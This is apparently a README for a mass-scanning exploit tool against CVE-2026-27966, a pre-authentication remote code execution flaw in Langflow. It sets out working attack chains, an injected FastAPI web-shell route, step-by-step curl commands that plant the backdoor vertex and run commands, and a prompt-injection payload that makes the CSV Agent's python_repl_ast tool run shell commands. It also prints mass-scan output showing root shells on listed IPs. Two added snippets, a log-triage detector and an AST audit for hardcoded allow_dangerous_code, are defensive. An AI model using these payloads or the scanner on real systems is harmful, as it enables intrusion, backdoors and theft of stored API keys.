# CVE-2026-27966 — Langflow Remote Code Execution Scanner
Pre-Auth Route Injection + Vertex Injection → Python Code Execution

---

## Overview

**CVE-2026-27966** is a critical-severity (CVSS 9.8) pre-authentication remote code execution vulnerability in **Langflow** versions prior to 1.8.0. The vulnerability stems from `allow_dangerous_code=True` being hardcoded in the CSV Agent component, exposing LangChain's `python_repl_ast` tool to unauthenticated prompt injection.

Additionally, multiple API endpoints lack proper authentication, enabling direct route injection and flow vertex injection — even on instances where the CSV Agent is not configured.

### Affected Versions

| Langflow Version | Status |
|---|---|
| < 1.8.0 | Vulnerable |
| >= 1.8.0 | Patched |

---

## Attack Vectors

This scanner tests three distinct exploitation paths:

### 1. Route Injection (auto_login bypass)
```
GET  /api/v1/auto_login          → obtain session / API key
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE
```

### 2. Direct Route Injection (no API key)
```
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE
```

### 3. Build Vertex Injection (no-auth build)
```
GET  /api/v1/flows/basic_examples  → extract flow UUIDs (26 exposed)
POST /api/v1/build/{UUID}/vertices → inject malicious vertex
POST /api/v1/run/{UUID}            → execute vertex code → RCE
```
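
For detection, the three request chains above leave a recognisable order of requests in reverse-proxy access logs. The following is an added example, not part of the scanner or of Langflow: it labels each request by stage and rates each client by how far along a chain it got. The log lines are constructed, and the function names and the rule that legitimate routes sit under a versioned `/api/vN/` prefix are assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log lines (common log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2026:10:00:01 +0000] "GET /api/v1/auto_login HTTP/1.1" 200 512
192.0.2.10 - - [01/Mar/2026:10:00:02 +0000] "POST /api/v1/custom_component HTTP/1.1" 200 2048
192.0.2.10 - - [01/Mar/2026:10:00:03 +0000] "GET /api/sh?c=id HTTP/1.1" 200 64
198.51.100.7 - - [01/Mar/2026:10:05:00 +0000] "GET /api/v1/flows/basic_examples/ HTTP/1.1" 200 90000
198.51.100.7 - - [01/Mar/2026:10:05:01 +0000] "POST /api/v1/build/bb0a7390-22a1-4a2e-8d7c-15463e53d9f2/vertices HTTP/1.1" 200 300
203.0.113.5 - - [01/Mar/2026:10:06:00 +0000] "GET /api/v1/version HTTP/1.1" 200 70
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
UUID = r"[0-9a-fA-F-]{36}"
STAGES = [  # (label, method, path pattern), taken from the three chains above
    ("auto_login", "GET", re.compile(r"^/api/v1/auto_login/?$")),
    ("enum_flows", "GET", re.compile(r"^/api/v1/flows/basic_examples/?$")),
    ("inject", "POST", re.compile(r"^/api/v1/custom_component/?$")),
    ("inject", "POST", re.compile(rf"^/api/v1/build/{UUID}/vertices/?$")),
    # Assumption: legitimate API routes live under a versioned prefix (/api/v1/...).
    ("unknown_route", "GET", re.compile(r"^/api/(?!v\d+(?:/|$))[^/]+$")),
]

def classify(method, target):
    """Label one request, ignoring the query string."""
    path = target.split("?", 1)[0]
    return next((lbl for lbl, verb, rx in STAGES
                 if method == verb and rx.match(path)), None)

def severity(stages):
    """critical: unversioned /api route hit after an injection request;
    high: injection request accepted; low: reconnaissance only."""
    after = stages[stages.index("inject"):] if "inject" in stages else []
    return "critical" if "unknown_route" in after else "high" if after else "low"

def triage(log_text):
    """Map client IP -> severity from the ordered stages it completed (2xx only)."""
    seen = defaultdict(list)
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        label = classify(m.group(2), m.group(3))
        if label and m.group(4).startswith("2"):
            seen[m.group(1)].append(label)
    return {ip: severity(stages) for ip, stages in seen.items()}

if __name__ == "__main__":
    for ip, level in triage(SAMPLE_LOG).items():
        print(f"{ip}: {level}")
```

A `critical` verdict means a route was served outside the versioned API after an injection request succeeded; since the page notes the route persists in memory until restart, such a host should be restarted and treated as compromised.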

---

## Vulnerability Mechanism

### Root Cause

In `src/lfx/src/lfx/components/langchain_utilities/csv_agent.py`, the CSV Agent node hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain's `python_repl_ast` tool:

```python
agent_kwargs = {
    "verbose": self.verbose,
    "allow_dangerous_code": True,  # hardcoded — cannot be disabled via UI
}
agent_csv = create_csv_agent(..., **agent_kwargs)
```

This allows any prompt that reaches the CSV Agent to execute arbitrary Python code via:

```
Action: python_repl_ast
Action Input: __import__("os").system("command")
```
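
To audit your own components and forks for the same pattern, the added example below (not Langflow's code and not the upstream fix) walks Python source with `ast` and reports every place `allow_dangerous_code` is set to a literal `True`, either as a dict entry or as a keyword argument. `SAMPLE` is constructed from the excerpt above plus two extra calls, and `find_hardcoded_dangerous_flags` is a hypothetical helper name.

```python
import ast

FLAG = "allow_dangerous_code"

# Constructed sample: the excerpt above, a keyword-argument variant, and a
# configurable (non-hardcoded) variant that must not be reported.
SAMPLE = '''
agent_kwargs = {
    "verbose": self.verbose,
    "allow_dangerous_code": True,
}
agent_csv = create_csv_agent(..., **agent_kwargs)
other = create_pandas_dataframe_agent(llm, df, allow_dangerous_code=True)
safe = create_csv_agent(llm, path, allow_dangerous_code=self.allow_dangerous_code)
'''


def _is_true(node):
    """True only for the literal constant True, not for names or attributes."""
    return isinstance(node, ast.Constant) and node.value is True


def find_hardcoded_dangerous_flags(source, filename="<string>"):
    """Return sorted (line, kind) pairs for each literal allow_dangerous_code=True."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Dict):
            # Keys are None for **unpacking entries; those are skipped.
            for key, value in zip(node.keys, node.values):
                if (isinstance(key, ast.Constant) and key.value == FLAG
                        and _is_true(value)):
                    findings.append((value.lineno, "dict"))
        elif isinstance(node, ast.Call):
            for kw in node.keywords:
                if kw.arg == FLAG and _is_true(kw.value):
                    findings.append((kw.value.lineno, "keyword"))
    return sorted(findings)


if __name__ == "__main__":
    for line, kind in find_hardcoded_dangerous_flags(SAMPLE):
        print(f"line {line}: {FLAG}=True hardcoded ({kind})")
```

The check is syntactic: a flag passed through a variable that is always `True` at runtime is not reported, so findings are a lower bound.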

### Unauthenticated API Surface

The Langflow REST API exposes several endpoints without authentication:

| Endpoint | Auth | Data Exposed |
|---|---|---|
| `GET /api/v1/version` | None | Langflow version |
| `GET /api/v1/health` | None | Instance status |
| `GET /api/v1/flows/basic_examples/` | None | **26 example flow UUIDs + structure** |
| `POST /api/v1/build/{uuid}/vertices` | None | **Accepts arbitrary code injection** |
| `POST /api/v1/users/` | None | User creation (inactive) |
| `GET /openapi.json` | None | Full API documentation |

### Auth Bypass via auto_login

On instances where `auto_login` is enabled (default in many Docker deployments), an attacker obtains a valid session and API key:

```bash
curl -sk 'https://target.com/api/v1/auto_login'
# Returns session with access_token → full API access
```

With a valid API key, the attacker can use `POST /api/v1/custom_component` to register a backdoor FastAPI route that persists in memory until server restart:

```python
from fastapi import APIRouter, Query
router = APIRouter()
@router.get("/sh")
async def cmd(c: str = Query("")):
    import os
    return os.popen(c).read()
app.include_router(router, prefix="/api")
```

### Why CVSS 9.8

| Metric | Value |
|---|---|
| Attack Vector | Network (remote) |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-27966.git
cd CVE-2026-27966
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target
python cve_2026_27966.py -t target.com:7860

# Mass scan
python cve_2026_27966.py -f targets.txt

# Mass scan + save results
python cve_2026_27966.py -f targets.txt -o rce.txt

# Detect only (skip exploitation)
python cve_2026_27966.py -f targets.txt --no-exploit

# Verbose output
python cve_2026_27966.py -f targets.txt -v
```

### Arguments

```
  -t, --target      Single target (IP:port or domain)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-exploit      Detection only, skip RCE attempts
  -v, --verbose     Show all results including non-RCE targets
```

---

## Proof of Concept

### Detection & Exploitation

```bash
$ python cve_2026_27966.py -t target.com:7860 -v
```

```
  CVE-2026-27966 — Langflow RCE Scanner
  CVSS 9.8 | Pre-Auth | Route Injection → RCE

  Host     : target.com:7860
  Langflow : YES v1.2.0
  Vuln     : YES
  API Key  : NOT REQUIRED
  RCE      : YES
  Output   : uid=0(root) gid=0(root) groups=0(root)
  Time     : 12.3s
```

### Mass Scan Output

```
  CVE-2026-27966 Langflow RCE Scanner
  Targets: 4127 | Threads: 30 | Exploit: ON
  -------------------------------------------------------

  [RCE]  185.132.37.96     v1.2.0    7.3s
         uid=0(root) gid=0(root) groups=0(root)
  [AUTH] 15.160.180.58:4433 v1.2.0   14.1s  (API key)
  [500/4127] scanning... (12%)

  -------------------------------------------------------
  Total: 4127 | Langflow: 47 | RCE: 3 | API-Protected: 41
  -------------------------------------------------------
```

### Manual Exploitation

**Step 1 — Detect Langflow**
```bash
curl -sk 'https://target.com/api/v1/version'
# {"version":"1.2.0","main_version":"1.2.0","package":"Langflow"}
```

**Step 2 — Extract flow UUIDs**
```bash
curl -sk 'https://target.com/api/v1/flows/basic_examples/' | jq '.[0].id'
# "bb0a7390-22a1-4a2e-8d7c-15463e53d9f2"
```

**Step 3 — Inject backdoor vertex**
```bash
curl -sk -X POST 'https://target.com/api/v1/build/{UUID}/vertices' \
  -H 'Content-Type: application/json' \
  -d '{"id":"bkdr","type":"CustomComponent","data":{"code":"from fastapi import APIRouter\nrouter=APIRouter()\n@router.get(\"/sh\")\nasync def cmd(c:str=\"\"):import os;return os.popen(c).read()\napp.include_router(router,prefix=\"/api\")","display_name":"X"}}'
```

**Step 4 — Execute command**
```bash
curl -sk 'https://target.com/api/sh?c=id;hostname;uname -a'
```

---

## Impact

Successful exploitation yields **remote code execution as root** in the Langflow Docker container. From there an attacker can:

- Extract API keys from Langflow's SQLite database (OpenAI, Anthropic, Gemini, etc.)
- Access connected vector databases and external services
- Deploy persistent backdoors via custom components
- Pivot to internal networks
- Deploy cryptominers or C2 infrastructure

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse. By using this software, you accept full responsibility for your actions.

---

## References

| Resource | Link |
|---|---|
| GitHub Advisory | [GHSA-3645-fxcv-hqr4](https://github.com/advisories/GHSA-3645-fxcv-hqr4) |
| Fix Commit | [d8c6480d](https://github.com/langflow-ai/langflow/commit/d8c6480daa17b2f2af0b5470cdf5c3d28dc9e508) |
| Metasploit Module | [Rapid7](https://github.com/rapid7/metasploit-framework) |
| NVD Entry | [CVE-2026-27966](https://nvd.nist.gov/vuln/detail/CVE-2026-27966) |

---


  This project is not affiliated with Langflow or Logspace.